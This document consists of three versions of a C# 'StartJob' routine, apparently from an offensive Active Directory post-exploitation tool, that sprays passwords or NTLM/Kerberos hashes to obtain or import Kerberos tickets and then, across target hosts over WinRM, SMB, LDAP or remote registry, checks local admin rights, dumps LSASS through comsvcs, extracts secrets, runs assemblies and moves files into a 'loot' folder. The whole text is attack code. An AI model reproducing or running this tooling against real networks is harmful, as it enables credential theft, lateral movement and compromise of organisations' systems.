public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags) { AToken.MakeToken("Fake", "Fake", "Fake"); string ticketoutput; if (String.IsNullOrEmpty(ticket)) { foreach (string user in users) { var secrets = hashes.Length > 0 ? hashes : passwords; foreach (string secret in secrets) { string hash; if (passwords.Length > 0) { string salt = String.Format("{0}{1}", domain.ToUpper(), user); hash = Crypto.KerberosPasswordHash(encType, secret, salt); } else { hash = secret; } Console.WriteLine("------------------"); Console.WriteLine(string.Format("[*] User: {0}", user)); Console.WriteLine(string.Format("[*] domain: {0}", domain)); Console.WriteLine(string.Format("[*] secret: {0}", secret)); ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc); if (ticketoutput.Contains("[+] Ticket successfully imported!")) { Console.WriteLine("[+] Ticket successfully imported!"); } else { Console.WriteLine("[-] Could not request TGT"); continue; } //ticket debugging //List<LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(false, new LUID(), "", "", "", true); //LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Klist); Console.WriteLine(); foreach (string computername in computernames) { Console.WriteLine(String.Format("[*] Checking {0}", computername)); if (!Misc.CheckHostPort(computername, 5985)) { Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername)); Console.WriteLine(); continue; } if (!Directory.Exists(Path.Combine("loot", computername))) { Directory.CreateDirectory(Path.Combine("loot", computername)); } if (module.Length == 0 || module.Contains("exec")) { Wsman.CheckLocalAdmin(computername, moduleargument, flags); } else if (module.Contains("comsvcs")) { Wsman.InvokeComSvcsLsassDump(computername); } else if (module.Contains("secrets") || module.Contains("secret")) { Wsman.GetSecrets(computername); } else if (module.Contains("assembly")) { Wsman.ExecuteAssembly(computername, path, moduleargument, flags); } else if (module.Contains("download")) { Wsman.CopyFile(computername, path, destination); } else if (module.Contains("upload")) { Wsman.UploadFile(computername, path, destination); } Console.WriteLine(""); } } } } else { Console.WriteLine("------------------"); Console.WriteLine(string.Format("[*] Ticket: {0}", ticket)); ticketoutput = SecurityContext.ImportTicket(ticket); if (ticketoutput.Contains("[+] Ticket successfully imported!")) { Console.WriteLine("[+] TGT imported successfully!"); } else { Console.WriteLine("[-] Could not import TGT"); return; } //ticket debugging //List<LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(false, new LUID(), "", "", "", true); //LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Klist); Console.WriteLine(); foreach (string computername in computernames) { Console.WriteLine(String.Format("[*] Checking {0}", computername)); if (!Misc.CheckHostPort(computername, 5985)) { Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername, flags)); Console.WriteLine(); continue; } if (!Directory.Exists(Path.Combine("loot", computername))) { Directory.CreateDirectory(Path.Combine("loot", computername)); } if (module.Length == 0 || module.Contains("exec")) { Wsman.CheckLocalAdmin(computername, moduleargument, flags); } else if (module.Contains("comsvcs")) { Wsman.InvokeComSvcsLsassDump(computername); } else if (module.Contains("secrets") || module.Contains("secret")) { Wsman.GetSecrets(computername); } else if (module.Contains("assembly")) { Wsman.ExecuteAssembly(computername, path, moduleargument, flags); } else if (module.Contains("download")) { Wsman.CopyFile(computername, path, destination); } else if (module.Contains("upload")) { Wsman.UploadFile(computername, path, destination); } Console.WriteLine(""); } } AToken.RevertFromToken(); }
public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, List <string> flags) { string ticketoutput; if (String.IsNullOrEmpty(ticket)) { foreach (string user in users) { var secrets = hashes.Length > 0 ? hashes : passwords; foreach (string secret in secrets) { string hash; if (passwords.Length > 0) { string salt = String.Format("{0}{1}", domain.ToUpper(), user); hash = Crypto.KerberosPasswordHash(encType, secret, salt); } else { hash = secret; } AToken.MakeToken("Fake", "Fake", "Fake"); Console.WriteLine("------------------"); Console.WriteLine(string.Format("[*] User: {0}", user)); Console.WriteLine(string.Format("[*] domain: {0}", domain)); Console.WriteLine(string.Format("[*] secret: {0}", secret)); ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc); if (ticketoutput.Contains("[+] Ticket successfully imported!")) { Console.WriteLine("[+] Ticket successfully imported!"); } else { Console.WriteLine("[-] Could not request TGT"); continue; } Console.WriteLine(); foreach (string computername in computernames) { Console.WriteLine(String.Format("[*] Checking {0}", computername)); if (!Misc.CheckHostPort(computername, 445)) { Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername)); Console.WriteLine(); continue; } if (!Directory.Exists(Path.Combine("loot", computername))) { Directory.CreateDirectory(Path.Combine("loot", computername)); } Smb.CheckLocalAdmin(computername, module); Console.WriteLine(""); } AToken.RevertFromToken(); } } } else { AToken.MakeToken("Fake", "Fake", "Fake"); Console.WriteLine("------------------"); Console.WriteLine(string.Format("[*] Ticket: {0}", ticket)); ticketoutput = SecurityContext.ImportTicket(ticket); if (ticketoutput.Contains("[+] Ticket successfully imported!")) { Console.WriteLine("[+] TGT imported successfully!"); } else { Console.WriteLine("[-] Could not import TGT"); return; } Console.WriteLine(); foreach (string computername in computernames) { Console.WriteLine(String.Format("[*] Checking {0}", computername)); if (!Misc.CheckHostPort(computername, 445)) { Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername)); Console.WriteLine(); continue; } if (!Directory.Exists(Path.Combine("loot", computername))) { Directory.CreateDirectory(Path.Combine("loot", computername)); } Smb.CheckLocalAdmin(computername, module); Console.WriteLine(""); } AToken.RevertFromToken(); } }
public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags, string protocol) { AToken.MakeToken("Fake", "Fake", "Fake"); Console.WriteLine("------------------"); if (String.IsNullOrEmpty(ticket)) { var secrets = hashes.Length > 0 ? hashes : passwords; foreach (string user in users) { foreach (string secret in secrets) { string hash; if (passwords.Length > 0) { string salt = String.Format("{0}{1}", domain.ToUpper(), user); hash = Crypto.KerberosPasswordHash(encType, secret, salt); } else { hash = secret; } Console.WriteLine(string.Format("[*] User: {0}", user)); Console.WriteLine(string.Format("[*] Domain: {0}", domain)); Console.WriteLine(string.Format("[*] Secret: {0}", secret)); string ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc); if (ticketoutput.Contains("[+] Ticket successfully imported!")) { Console.WriteLine("[+] Ticket successfully imported!"); } else { Console.WriteLine("[-] Could not request TGT"); continue; } if (protocol.ToLower() == "smb") { Scan.SMB(computernames, module); } else if (protocol.ToLower() == "winrm") { Scan.WINRM(computernames, module, moduleargument, path, destination, flags); } else if (protocol.ToLower() == "reg32") { Scan.REG32(computernames, module); } else if (protocol.ToLower() == "ldap") { Scan.LDAP(module, domain, dc); } } } } else { Console.WriteLine(string.Format("[*] Ticket: {0}", ticket)); string ticketoutput = SecurityContext.ImportTicket(ticket); if (ticketoutput.Contains("[+] Ticket successfully imported!")) { Console.WriteLine("[+] TGT imported successfully!"); } else { Console.WriteLine("[-] Could not import TGT"); return; } if (protocol.ToLower() == "smb") { Scan.SMB(computernames, module); } else if (protocol.ToLower() == "winrm") { Scan.WINRM(computernames, module, moduleargument, path, destination, flags); } else if (protocol.ToLower() == "reg32") { Scan.REG32(computernames, module); } else if (protocol.ToLower() == "ldap") { Scan.LDAP(module, domain, dc); } } AToken.RevertFromToken(); }